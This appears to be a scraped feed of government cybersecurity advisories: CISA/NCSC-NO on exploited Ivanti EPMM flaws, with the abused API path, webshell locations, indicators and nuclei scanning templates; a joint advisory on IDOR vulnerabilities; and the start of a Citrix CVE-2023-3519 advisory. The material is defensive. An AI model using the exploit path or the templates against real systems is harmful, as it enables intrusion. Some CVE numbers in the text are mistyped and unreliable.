Exchange Server, Multiple Versions |
CISA Alert: Microsoft Releases Workaround Guidance for MSDT "Follina" Vulnerability |
||
Microsoft |
Multiple Products |
|||
QNAP |
Certain QNAP NAS running Photo Station with internet exposure Ausustor Network Attached Storage |
|||
Microsoft |
Exchange Server 2016 Cumulative Update 23, 2019 Cumulative Update 12, 2019 Cumulative Update 11, 2016 Cumulative Update 22, and 2013 Cumulative Update 23 |
Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2022-41082 |
ACSC Alert: Vulnerability Alert – 2 new Vulnerabilities associated with Microsoft Exchange. |
|
Fortinet |
FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0 |
FortiOS / FortiProxy / FortiSwitchManager - Authentication bypass on administrative interface |
The Cybersecurity and Infrastructure Security Agency (CISA) and the Norwegian National Cyber Security Centre (NCSC-NO) are releasing this joint Cybersecurity Advisory (CSA) in response to active exploitation of CVE-2023-35078 and CVE-2023-35081. Advanced persistent threat (APT) actors exploited CVE-2023-35078 as a zero day from at least April 2023 through July 2023 to gather information from several Norwegian organizations, as well as to gain access to and compromise a Norwegian government agency’s network.
Ivanti released a patch for CVE-2023-35078 on July 23, 2023. Ivanti later determined actors could use CVE-2023-35078 in conjunction with another vulnerability CVE-2023-35081 and released a patch for the second vulnerability on July 28, 2023. NCSC-NO observed possible vulnerability chaining of CVE-2023-35081 and CVE-2023-35078.
CVE-2023-35078 is a critical vulnerability affecting Ivanti Endpoint Manager Mobile (EPMM) (formerly known as MobileIron Core). The vulnerability allows threat actors to access personally identifiable information (PII) and gain the ability to make configuration changes on compromised systems. CVE-2023-35081 enables actors with EPMM administrator privileges to write arbitrary files with the operating system privileges of the EPMM web application server. Threat actors can chain these vulnerabilities to gain initial, privileged access to EPMM systems and execute uploaded files, such as webshells.
Mobile device management (MDM) systems are attractive targets for threat actors because they provide elevated access to thousands of mobile devices, and APT actors have exploited a previous MobileIron vulnerability. Consequently, CISA and NCSC-NO are concerned about the potential for widespread exploitation in government and private sector networks.
This CSA provides indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) obtained by NCSC-NO investigations. The CSA also includes a nuclei template to identify unpatched devices and detection guidance organizations can use to hunt for compromise. CISA and NCSC-NO encourage organizations to hunt for malicious activity using the detection guidance in this CSA. If potential compromise is detected, organizations should apply the incident response recommendations included in this CSA. If no compromise is detected, organizations should still immediately apply patches released by Ivanti.
Download the PDF version of this report:
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 13. See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
In July 2023, NCSC-NO became aware of APT actors exploiting a zero-day vulnerability in Ivanti Endpoint Manager (EPMM), formerly known as MobileIron Core, to target a Norwegian government network. Ivanti confirmed that the threat actors exploited CVE-2023-35078 and released a patch on July 23, 2023.[1] Ivanti later determined actors could use CVE-2023-35078 in conjunction with another vulnerability, CVE-2023-35081, and released a patch for the second vulnerability on July 28, 2023.[2]
CVE-2023-35078 is a critical authentication bypass [CWE-288] vulnerability affecting Ivanti Endpoint Manager Mobile (EPMM), formerly known as MobileIron Core. The vulnerability allows unauthenticated access to specific application programming interface (API) paths. Threat actors with access to these API paths can access PII such as names, phone numbers, and other mobile device details of users on the vulnerable system; make configuration changes to vulnerable systems; push new packages to mobile endpoints; and access Global Positioning System (GPS) data if enabled.
According to Ivanti, CVE-2023-35078 can be chained with a second vulnerability CVE-2023-35081.[2] CVE-2023-35081 is directory traversal vulnerability [CWE-22] in EPMM. This vulnerability allows threat actors with EPMM administrator privileges the capability to write arbitrary files, such as webshells, with operating system privileges of the EPMM web application server. The actors can then execute the uploaded file.[2]
CISA added CVE-2023-35078 to its Known Exploited Vulnerabilities Catalog on July 25, 2023, and CVE-2023-35081 on July 31, 2023.
CISA and NCSC-NO are concerned about the potential for widespread exploitation of both vulnerabilities in government and private sector networks because MDM systems provide elevated access to thousands of mobile devices. Threat actors, including APT actors, have previously exploited a MobileIron vulnerability [3],[4].
The APT actors have exploited CVE-2023-35078 since at least April 2023. The actors leveraged compromised small office/home office (SOHO) routers, including ASUS routers, to proxy [T1090] to target infrastructure, and NCSC-NO observed the actors exploiting CVE-2023-35078 to obtain initial access to EPMM devices [T1190] and:
/mifs/aad/api/v2/authorized/users
to list users and administrators [T1087.002] on the EPMM device.The APT actors deleted some of their entries in Apache httpd logs [T1070] using mi.war
, a malicious Tomcat application that deletes log entries based on the string in keywords.txt
. The actors deleted log entries with the string Firefox/107.0
.
The APT actors used Linux and Windows user agents with Firefox/107.0
to communicate with EPMM. Other agents were used; however, these user agents did not appear in the device logs. It is unconfirmed how the threat actors ran shell commands on the EPMM device; however, NCSC-NO suspects the actors exploited CVE-2023-35081 to upload webshells on the EPMM device and run commands [T1059].
The APT actors tunneled traffic [T1572] from the internet through Ivanti Sentry, an application gateway appliance that supports EPMM, to at least one Exchange server that was not accessible from the internet [T1090.001]. It is unknown how they tunneled traffic. NCSC-NO observed that the network traffic used the TLS certificate of the internal Exchange server. The APT actors likely installed webshells [T1505.003] on the Exchange server in the following paths [T1036.005]:
/owa/auth/logon.aspx
/owa/auth/logoff.aspx
/owa/auth/OutlookCN.aspx
NCSC-NO also observed mi.war
on Ivanti Sentry but do not know how the actors placed it there.
See Table 1—Table 7 for all referenced threat actor tactics and techniques in this advisory.
Technique Title |
ID |
Use |
---|---|---|
Exploit Public-Facing Application |
The APT actors exploited CVE-2023-35078 in public facing Ivanti EPMM appliances since at least April 2023. |
Technique Title |
ID |
Use |
---|---|---|
Command and Scripting Interpreter |
The APT actors may have exploited CVE-2023-35081 to upload webshells on the EPMM device and run commands. |
Technique Title |
ID |
Use |
---|---|---|
Account Discovery: Domain Account |
The APT actors exploited CVE-2021-35078 to gather EPMM device users and administrators. |
|
Remote System Discovery |
The APT actors retrieved LDAP endpoints. |
Technique Title |
ID |
Use |
---|---|---|
Masquerading: Match Legitimate Name or Location |
The APT actors likely installed webshells at legitimate Exchange server paths. |
|
Server Software Component: Web Shell |
The APT actors implanted webshells on the compromised infrastructure. |
Technique Title |
ID |
Use |
---|---|---|
Indicator Removal |
APT actors deleted httpd access logs after the malicious activities took place using string |
Technique Title |
ID |
Use |
---|---|---|
Data from Local System |
APT actors regularly checked EPMM Core audit logs. |
Technique Title |
ID |
Use |
---|---|---|
Protocol Tunneling |
The APT actors tunneled traffic from the internet to an Exchange server that was not accessible from the internet. |
|
Proxy |
The actors leveraged compromised SOHO routers to proxy to and compromise infrastructure. The actors tunneled traffic from the internet to at least one Exchange server. |
|
Proxy: Internal Proxy |
The APT actors tunneled traffic from the internet to an Exchange server that was not accessible from the internet. |
CISA recommends administrators use the following CISA-developed nuclei template to determine vulnerability to CVE-2023-30578:
id: CVE-2023-35078-Exposure
info: name: Ivanti EPMM Remote Unauthenticated API Access author: JC severity: critical reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-35078 description: Identifies vulnerable instances of Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, through 11.10 allows remote attackers to obtain PII, add an administrative account, and change the configuration because of an authentication bypass. tags: ivanti, mobileiron, epmm, auth-bypass
requests: - method: GET path: - "{{RootURL}}/mifs/aad/api/v2/ping"
matchers-condition: and matchers:
- type: status status: - 200
- type: word part: body words: - "vspVersion" - "apiVersion" condition: and |
CISA recommends administrators use the following CISA-developed nuclei template to determine vulnerability to CVE-2023-35081:
id: CVE-2023-35081
info: name: Ivanti EPMM Remote Arbitrary File Write author: JC severity: High reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-35081 description: Identifies vulnerable unpatched versions of Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, through 11.10.0.3, 11.9.1.2, and 11.8.1.2 that allows an authenticated administrator to perform arbitrary file writes to the EPMM server. tags: ivanti, mobileiron, epmm
requests: - method: GET path: - "{{RootURL}}/mifs/c/windows/api/v2/device/registration"
matchers-condition: and matchers:
- type: status status: - 200
- type: regex part: all regex: - '.*?VSP ((0?[0-9]|10)(.d+){1,3}|11.(0?[0-7])(.d+){1,2}|11.8.0(.d+)?|11.8.1.[0-1]|11.9.0(.d+)?|11.9.1.[0-1]|11.10.0.[0-2]).*' |
Run the following NCSC-NO-created checks to check for signs of compromise:
syslogs
from EPMM devices for any occurrences of /mifs/aad/api/v2/
.EventCode=1644
in the AD since at least April 2023. The LDAP queries performed by EPMM when the threat actor used the MIFS API generated tens of millions of this event code. Also look for EventCodes 4662
, 5136
, and 1153
.CN=EXCHANGE01
or similar.If compromise is detected, organizations should:
CISA and NCSC-NO recommend organizations:
# install rpm url https://support.mobileiron.com/ivanti-updates/ivanti-security-update-1.0.0-1.noarch.rp
In addition to applying mitigations, CISA and NCSC-NO recommends exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
[1] Ivanti: CVE-2023-35078 – Remote Unauthenticated API Access Vulnerability
[2] Ivanti: CVE-2023-35081 – Remote Arbitrary File Write
[3] CISA: Potential for China Cyber Response to Heightened U.S.-China Tensions
[4] CISA: Top Routinely Exploited Vulnerabilities
Ivanti contributed to this joint advisory.
August 1, 2023: Initial version.
NCSC-NO observed the following webshell hash:
c0b42bbd06d6e25dfe8faebd735944714b421388 |
NCSC-NO observed the following hash of mi.war
:
1cd358d28b626b7a23b9fd4944e29077c265db46 |
NCSC-NO observed the following JA3 Hashes used against MobileIron Core:
2d5bd942ebf308df61e1572861d146f6 473cd7cb9faa642487833865d516e578 579ccef312d18482fc42e2b822ca2430 849d3331f3e07a0797a02f12a6a82aa9 8d9f7747675e24454cd9b7ed35c58707 ad55557b7cbd735c2627f7ebb3b3d493 cd08e31494f9531f560d64c695473da9 e1d8b04eeb8ef3954ec4f49267a783ef e60dc8370ecf78cf115162fbc257baf5 e669667efb41c36f714c309243f41ca7 e84a32d43db750b206cb6beed08281d0 eb5fdc72f0a76657dc6ea233190c4e1c |
NCSC-NO observed the following JA3 Hashes used against Exchange when tunneling via EPMM Sentry:
0092ce298a1d451fbe93dc4237053a96 00e872019b976e69a874ee7433038754 01ecd9ab9be75e832c83c082be3bdf18 0212a88c7ed149febdefa347c610b248 02be3b93640437dbba47cc7ed5ab7895 03f8852448a85e14f2b4362194160c32 045f8ccdac6d4e769b30da406808da71 04e7f5787f89a597001b50a37b9f8078 070f9fe9f0ec69e6b8791d280fde6a48 07a624d7236cca3934cf1f8e44b74b52 09df72c01a1a0ad193e2fff8e454c9c4 0b28842d64a344c287e6165647f3b3fe 0b8e1211de50d244b89e6c1b366d3ccf 0cb0380cf75a863b3e40a0955b1ada9f 0da24834056873a8cd8311000088e8be 0e1fad8ffaa7a939f0a6cbf9cd7e2fcd 0f6e78839398c245d13f696a3216d840 119f8c9050d1499b6f958b857868b8ce 11c506d5e3fb7e119c4287202c96a930 1336df27f94b25a25acac9db3e61e461 14671c3f8deca7d73a03b74cb854c21d 146caf9bd0153428f54e9ef472154983 14994353f3ea6fd25952a8c7d57f9ecf 151bc875df15d1385e6eb02f9edaba06 15a074a397727b26a846b443b99c20ff 1660f3d882a4311ca013ee4586e01fd9 16a74fc216f8a4ce43466bb83b6d3fd2 188623fdd056c4ed13d1ff34c7377637 19f51486abd40c9f0fc0503559a6c523 1a024e63721c610d2e54e67d62cd5460 1aa7dae8f2ae0a29402ed51819f82db4 1abfdeaadb74a0f7c461e7bab157b17f 1b6720ed0b67c910a80722ce973d6217 1b7d9368c6ce7623fdbc43f013626535 1e0850e10a00c9bbdd5c582ff4cb6833 1ec71612e438cf902913eec993475eb9 206fed3a39d9215c35395663f5bb3307 22cc1b3bc9f99d3a520ae58fee79a0d5 23e3e6fa8b23d9bc19e82de4e64c79e9 253fd4659bf21be116858bc0f206c5b9 276e175d4fe8454c4c47e966d8cb3fa3 289a450c7478dd52a10c6ed2fb47f7e9 2aa8ba7478b1362274666d714df575bc 2beecb6b9e386f29d568229a9953c3d2 2ebc7fdceaa9a0df556e989d77157006 3003024afe64b4e8a5a30825c14bbb12 3082e669dda9d023e2dcd8b9549a84a8 309d33c6f77a3fc75654c44c61596ccd 30a9f568eb3df79352fc587a078623b6 30be84e6b95f44c203f8e7fce7339a8e 3268a5097a543c7dbd82c39a9193b7fe 32775ead3ea1ad7db2f4bea67fe0cabb 34ac9a6ef5d285119abec50fbe41fcfe 34d92552e278710c1e84f0bd8dc3a6b8 361f47a6357cc6e3a9bcdd20cfaaf0e9 3685abc75517e61e47e52e5f2d060f54 3744004013135b9f9a05cb58cda8134d 37d952966ea7e79277803f13d7147544 391a4c2c7541b8b78e2f99bf586e9794 393662e5aa0cb49c5d666a6d10a1ade6 3962b622c5aa815afb803b92aa948424 3b22af324abded2781ed8f6a61f3654f 3b30b4555cc8b4b164ad03cf322cbea8 3bd1bdb5e90b9590a8878bff2ada8204 3be529eb3a7daaf34f963a22188f6139 3dd13faad1c45eb0c23e4567210f7eac 403273b51f91cf3c333695e5532cb2c3 404f56045e436d53ead2177bf957ba39 41854adbc73b0b58e5c566f60bb0df25 43c22dabb1e6d2449a39c2f7e974d537 476e72bbda5b78d188766139889e3038 4898a51256ae7d914a5ffd5695973470 49230c486f0fd383cd301fe162d6a786 4959a611b9885022d81b4bc8e4b1d149 495c6ff7ca0379ad0891bac47917d09a 49d2bd08038dc7dada221008591940f9 4c1b73ec52e6eec0c5d20577fcbc9ef1 4d34db639ba84b11822fb3dac47ed7d1 5244b163f9326a1e5eaa8860f7543f99 539f1a5183800a96228458932f9307f7 5466368d4659f1b1470bcb09e65b484d 549cde6535a884126755fc53f59a820c 555389e92c622b87d3fc395fd8723501 588d0b42e54174a98e1eca59945e8b32 58bc21d305a65c41745327f142f3ac12 59401c9a60449c742d073d93d1b7039a 59eec218522cc5c7743a0d37892a3345 59faf75430e9326d3ae9d231bb3ae8c6 5d0259ca16cfc2d7d1b0fac69f29ab05 5d55026fb84dba91ac01e2095504b1bc 5e35f50c692081fd6c7ddac1272e2d6c 5f4d5965af741bba59b7c8d3425f33dd 6010282004917ecf3900babf61456432 6088c2a04c94cdcd5a283a6d1622ffba 61dee38d2f97220efb1218ad8971e3ab 62ac194f2526eb45485526bca35c8f43 634296a023280d020674c873d0199760 635755dadfab8b92fb502aafb09122db 63fc58be0d7b48eaa34da7f752ae8ae6 6441640409815cfb4bf469e685e1bdb5 646973d1928c401ba80961c12cbf84a2 65eef0a0ee257254ef0418aa57192cfb 66f6a192083a7ab00ae8e0b5cc52e8f4 67a42e2e27ffc26d1f3d0ceb8384afd0 689385f1218e0d4c347595648ca6a776 692f91c0c5e9e93e0a24bd3392887ca1 69ecf52960c8bd9e746dfe9ee19c11f6 6e359f3bbc622e9b1ed36f6e3d521bcf 6e3650528f719fc50988a1f697644832 6ead0d5d3f87911c27f3ae0a75e6b5bc 6f1fa8b444caf0d8238f948279ca74e1 6fb8cdf567dd7d89d53b5771d769cb5f 706b6055658aff067ae370f23831ef6b 708140c311d3d69418f75c928e7535a0 719ec5da8f2153a436ee8567ff609894 7292ef4cdca529071fad97496e1c9439 74871691eac48156ce0da2cfa3ab401a 74cf24f2a66a31c88b6fcfe01f12160c 75e874d8e0a79697633b87ea5e798b1c 76c0d09fed2f33babb0de8ee2c07144c 77a01363fa2b29af25c004da9570e23c 78988c65e9b70e7929e747408d8f0b0e 79c6d12d168b85437384b20eb94e106b 7b4137b4e85f31a81bb5bafeda993947 7b9db1d58326c1fa276ba2a39bcc2617 7cbc7459db5327c26476549f225030f5 7cd727171c2522f51417edeeba4f1791 7e3630c67c802eabb67b108ad4d7ded7 802f5d34c230da40c0912a1c5a9b702b 80bd0f3610f6c4d60584a5be0b8a3016 819030799f0020ed724c2ef3ffaa56c6 8207129585da68066ed08e94216d76ee 821f649d08687e22f96cea99fbb5d3a3 830838cb0620d659405a74401cd72557 833d3201066f5184c874c73a2083c448 840f488b7c0a5d686d1e89908735f354 84301b967a4d9a242466c04901bad691 85c3fac6a9885362c448f434671e362f 883b9fe16e45c388968defc73a5fba7a 8a6b0ba3496eeca39d6d3f9bae830c90 8ad0fd4b78c89bd63b97343fda1eeccb 8b0ae9029974091df12210255aaecad6 8b297f8b219e968932293ee7a8242ca3 8bb1781e756a53cd00d9b2ec670fa21e 8d5515351afdf27b013f96a05bf45147 8fafa73e9985e05d0c1c964da770c567 905967b08bd44cfa60d969229921ac23 9188ef45ea917a91ec9b92b5dd8cd90d 918dfab0333ae15d61f14fd24b5eaaac 922a3272aad17c9eaad733696a4321da 9253399537fad8448f1d4732dd79f6fa 934a8a6528e91caa019acb76e791a71d 95588e0386206fa02912cfcaf18c1220 9610328cdaa4694800c2c93410f8ce82 9622902cc43f4a20d0d686a37e4d8232 96c41e4c4a1812187fb279b9299ad63b 984c4653a563b19c87f264611a6adc01 9980febfaf901d4113a1c473f79d7eb6 9a176d818edff838fc057cea3ee372c0 9ba21c5148913186a5bf877078cbc048 9cfda02ef7e04c469b77f8197a249c17 9d74d395bd2f72a47a5c980e6040df5a 9df128ebe0c82064aa746647883112c9 9e5613533972a9d42d2e3344a4e58566 9ec17429eed5446e3720796ab50d8c60 9f2438aaab4744c4b7b5b7287a783099 9f3bf94572344b36f6ef1689cb30c66e 9fdd7a85b3a4ef8ded73beb3e6218109 a1b732a9af792f75a68ed78d72ffb8f6 a260d836428cdb971bdf147ca6940160 a4f11b1eb659869a0ae70898a4a0e5ee a596ebbcf438980c880d711315e4fdf1 a80b6a354b493264f37aa39d0d41b5fc a89df6156eb5a2de196388d4a123b470 a96837fe533247abb7f88000d0216a50 a98cf0a359f430a00f4f3d522f5b6cc0 aa2fe3a253e169b05e1782ca57a688d2 aef0172a2c03f77912de0bbf14aee00f af06c3e72f2f307515ba549174d8e5a6 b311ab82b30f41b12cb9089d00c4a1ff b4f31423445b5f13675f205ac997f41f b50666c9aed1c2f222c56b6e9b326d27 b53f179b3f25f72bb0c7ccf45bf8beee b57f3e41c03803306b0ee2111f7ef823 b79434613820faf30d58f103c4415a29 b8366aaa5ed51c0dea3fc90ef7e14889 b8f6b0d234a305c25411e83fd430c624 b956ed2b848dabb4e79ab7358233861b b9ecb08402df0f1f6e1ce76b8ad6e91f ba4a616c8d4ab9358a82b321d8e618bf bcd62f3e029f96f62c24d50d2d1402ac bcf75736d176394f3df69f3e0ef7dd9f be1f24457141d80206bc2e58f55dc879 c013f308d170aa2eca4a5b0f0bbd3ccb c0a2fd066c955137036f92da2c3a3ff1 c17b3ec40ed5216e44311138aafaea2c c262a39f49604f05a5656213f758cd46 c66f36eb180438882133717c3abb5157 c986c7bf720ce1463c3d628d2b3dad01 c9c16287cbbe5a037244e374ba84aecc cbcd728a2350712b5747cd3447473deb cbeeb123efe8cf7f842426b673415c28 ccb15eef4287c8efa472915bcb4ec458 ccdddb69e9344a039c4ac9c49a6f2d7b cd1312be032256a10cf866af3e9afae9 ce0dd163d9e02bfd42d61024523cb134 ceef2e728db1b5ae15432f844eeb66e1 d12d98a0877f6e3c8b5a59f41cc4de9b d131f17689f1f585e9bfdcdb72a626bb d173076d97a0400a56c81089912b9218 d255291bb8e460626cb906ebacc670e5 d2cea317778ad6412c458a8a33b964fd d3cfee76468a9556fd9d017c1c8ee028 d3d72f4c7038f7313ad0570e16c293bf d485a1b5db2f97dc56500376d677aa89 d662d20507bebc37b99a4d413afa2752 d711d577b9943ab4e2f8a2e06bb963e3 d92e87d2689957765987e2be732d728e d966c6c822122e96f6e9f5f1d4778391 daee31d7cc6e08ead6afad2175989e1d dbb293176747fa1c2e03cbc09433f236 dc26ef761c7ec40591b1fe6e561b521d dc9e6edeb7557bc80be68be15cebb77a dddfbae77336120febd5ad690af3e341 e1f579227327ebb21cde3f9e7511db01 e3c642432a815a07f035e01308aaa8fc e54329351788661f2a8d4677a759fc42 e82b7ad2c05f4617efbc86a78c1e61e9 e99cffa2afa064625f09e1c5aca8f961 ea6bd3db104ca210b5ad947d46134aaf eb277d809a59d39d02605c0edd9333e9 ed82a50d98700179c8ae70429457477a ef35374f4146b3532f0902d6f7f0ef8c ef4c4d79f02ac404f47513d3a73e20c7 f05a5a60ad6f92d6f28fa4f13ded952f f0776dfe17867709fdb0e0183ed71698 f20fbfd508e24d50522eadf0186b03eb f3d751b0585855077b46dfce226cfea1 f4dd9bb28d680a3368136fb3755e7ea9 f804388f302af1f999e4664543c885a1 f8bcc8f99a3afde66d7f5afb5d8f1b43 f8d6f89aecf792e844e72015c9f27c95 f967460f8c6de1cedb180c90c98bfe98 f9d5cc0cbae77ea1a371131f62662b6b fa4f1a3b215888bc5f19b9f91ba37519 fdff2bf247a7dad40bac228853d5a661 fe6e7fac4f0b4f25d215e28ca8a22957 fe9de1cdd645971c5d15ee1873c3ff8d febba89b4b9a9649b3a3bf41c4c7d853 |
NCSC-NO observed the following user agents communicating with Exchange (OWA and EWS):
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67 |
NCSC-NO observed the following user agents communicating with Exchange webshell:
Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A306 Safari/6531.22.7 Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Mozilla/5.0 (Linux; Android 7.0; Moto C Build/NRD90M.059) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.02272.101 Safari/537.36 Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-J120M Build/LMY47X) AppleWebKit/537.36 (KHTML, Like Gecko) SamsungBrowser/6.4 Chrome/56.0.2924.87 Mobile Safari/537.36 Mozilla/5.0 (iPhone; CPU iPhone OS 9_0_2 like Mac OS X) AppleWebKit/601.1.45 (KHTML, like Gecko) Version/9.0 Mobile/13A452 Safari/601.1 |
NCSC-NO observed the following user agents communicating with Exchange Autodiscover:
ExchangeServicesClient/15.00.0913.015 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Firefox/114.0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.0.0 |
NCSC-NO observed the following user agents communicating with EWS (/ews/Exchange.asmx):
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36 Edg/103.0.1264.49 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67 |
NCSC-NO observed the following user agent communicating with Exchange (/powershell):
Windows WinRM Client |
]]>
The Australian Signals Directorate’s Australian Cyber Security Centre (ACSC), U.S. Cybersecurity and Infrastructure Security Agency (CISA), and U.S. National Security Agency (NSA) are releasing this joint Cybersecurity Advisory to warn vendors, designers, and developers of web applications and organizations using web applications about insecure direct object reference (IDOR) vulnerabilities. IDOR vulnerabilities are access control vulnerabilities enabling malicious actors to modify or delete data or access sensitive data by issuing requests to a website or a web application programming interface (API) specifying the user identifier of other, valid users. These requests succeed where there is a failure to perform adequate authentication and authorization checks.
These vulnerabilities are frequently exploited by malicious actors in data breach incidents because they are common, hard to prevent outside the development process, and can be abused at scale. IDOR vulnerabilities have resulted in the compromise of personal, financial, and health information of millions of users and consumers.
ACSC, CISA, and NSA strongly encourage vendors, designers, developers, and end-user organizations to implement the recommendations found within the Mitigations section of this advisory—including the following—to reduce prevalence of IDOR flaws and protect sensitive data in their systems.
Download the PDF version of this report:
IDOR vulnerabilities are access control vulnerabilities in web applications (and mobile phone applications [apps] using affected web API) that occur when the application or API uses an identifier (e.g., ID number, name, or key) to directly access an object (e.g., a database record) but does not properly check the authentication or authorization of the user submitting the request. Depending on the type of IDOR vulnerability, malicious actors can access sensitive data, modify or delete objects, or access functions.
Typically, these vulnerabilities exist because an object identifier is exposed, passed externally, or easily guessed—allowing any user to use or modify the identifier.
These vulnerabilities are common[1] and hard to prevent outside the development process since each use case is unique and cannot be mitigated with a simple library or security function. Additionally, malicious actors can detect and exploit them at scale using automated tools. These factors place end-user organizations at risk of data leaks (where information is unintentionally exposed) or large-scale data breaches (where a malicious actor obtains exposed sensitive information). Data leaks or breaches facilitated by IDOR vulnerabilities include:
ACSC, CISA, and NSA recommend that vendors, designers, and implementors of web applications—including organizations that build and deploy software (such as HR tools) for their internal use and organizations that create open-source projects—implement the following mitigations. These mitigations may reduce prevalence of IDOR vulnerabilities in software and help ensure products are secure-by-design and -default.
For more information, see the joint Enduring Security Framework’s Securing the Software Supply Chain: Recommended Practices Guide for Developers, CISA’s Supply Chain Risk Management Essentials, and ACSC’s Cyber Supply Chain Risk Management.
Additionally, ACSC, CISA, and NSA recommend following cybersecurity best practices in production and enterprise environments. Software developers are high-value targets because their customers deploy software on their own trusted networks. For best practices, see:
ACSC, CISA, and NSA recommend that all end-user organizations, including those with on-premises software, SaaS, IaaS, and private cloud models, implement the mitigations below to improve their cybersecurity posture.
For more information, see the Enduring Security Framework’s Securing the Software Supply Chain: Recommended Practices Guide for Customers, CISA’s Supply Chain Risk Management Essentials, and ACSC’s Cyber Supply Chain Risk Management.
HTTP 404
and HTTP 403
are associated with common enumeration techniques.Additionally, ACSC, CISA, and NSA recommend following cybersecurity practices. For best practices, see ACSC’s Essential Eight, CISA’s CPGs, and NSA’s Top Ten Cybersecurity Mitigation Strategies.
ACSC, CISA, and NSA recommend that organizations:
ACSC, CISA, and NSA recommend that organizations with on-premises software or IaaS consider using SaaS models for their internet-facing websites.
Organizations leveraging SaaS with sufficient resources may consider conducting penetration testing and using vulnerability scanners. However, such tests may interfere with service provider operations. Organizations should consult with their legal counsel as appropriate to determine what can be included in the scope of the penetration testing.
If you or your organization are victim to a data breach or cyber incident, follow relevant cyber incident response and communications plans, as appropriate.
[1] A01 Broken Access Control - OWASP Top 10:2021
[2] A massive ‘stalkerware’ leak puts the phone data of thousands at risk
[3] Mobile device monitoring services do not authenticate API requests
[4] Behind the stalkerware network spilling the private phone data of hundreds of thousands
[5] First American Financial Corp. Leaked Hundreds of Millions of Title Insurance Records
[6] Biggest Data Breaches in US History [Updated 2023]
[7] AT&T Hacker 'Weev' Sentenced to 3.5 Years in Prison
[8] Fuzzing | OWASP Foundation
The information in this report is being provided "as is" for informational purposes only. ACSC, CISA, and NSA do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States or Australian Governments, and this guidance shall not be used for advertising or product endorsement purposes.
This document was developed in furtherance of the authors’ cybersecurity missions, including their responsibilities to identify and disseminate threats, and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.
]]>The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Cybersecurity Advisory to warn network defenders about exploitation of CVE-2023-3519, an unauthenticated remote code execution (RCE) vulnerability affecting NetScaler (formerly Citrix) Application Delivery Controller (ADC) and NetScaler Gateway. In June 2023, threat actors exploited this vulnerability as a zero-day to drop a webshell on a critical infrastructure organization’s non-production environment NetScaler ADC appliance. The webshell enabled the actors to perform discovery on the victim’s active directory (AD) and collect and exfiltrate AD data. The actors attempted to move laterally to a domain controller but network-segmentation controls for the appliance blocked movement.
The victim organization identified the compromise and reported the activity to CISA and Citrix. Citrix released a patch for this vulnerability on July 18, 2023.
This advisory provides tactics, techniques, and procedures (TTPs) and detection methods shared with CISA by the victim. CISA encourages critical infrastructure organizations to use the detection guidance included in this advisory for help with determining system compromise. If potential compromise is detected, organizations should apply the incident response recommendations provided in this CSA. If no compromise is detected, organizations should immediately apply patches provided by Citrix.
Download the PDF version of this report:
Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 13. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
In July 2023, a critical infrastructure organization reported to CISA that threat actors may have exploited a zero-day vulnerability in NetScaler ADC to implant a webshell on their non-production NetScaler ADC appliance. Citrix confirmed that the actors exploited a zero-day vulnerability: CVE-2023-3519. Citrix released a patch on July 18, 2023.[1]
CVE-2023-3519 is an unauthenticated RCE vulnerability affecting the following versions of NetScaler ADC and NetScaler Gateway:[1]
The affected appliance must be configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or authentication, authorization, and auditing (AAA) virtual server for exploitation.[1]
CISA added CVE-2023-3519 to its Known Exploited Vulnerabilities Catalog on July 19, 2023.
